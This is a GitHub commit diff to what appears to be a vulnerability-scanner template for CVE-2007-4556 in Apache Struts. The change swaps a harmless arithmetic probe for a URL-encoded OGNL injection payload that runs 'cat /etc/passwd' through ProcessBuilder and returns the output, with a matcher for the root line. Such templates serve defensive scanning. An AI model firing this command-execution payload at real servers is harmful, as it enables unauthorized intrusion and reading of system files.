update payloads CVE-2007-4556 🛠

patch-1
PikPikcU 2021-02-23 02:37:32 +00:00 committed by GitHub
parent 3be6ea99fd
commit 7eff3819e8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 4 deletions

View File

@ -14,14 +14,14 @@ requests:
headers: headers:
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
body: | body: |
username=test&password=%25%7B123456789*987654321%7D username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: regex
words: regex:
- "-67153019" - "root:[x*]:0:0"
condition: and condition: and
- type: status - type: status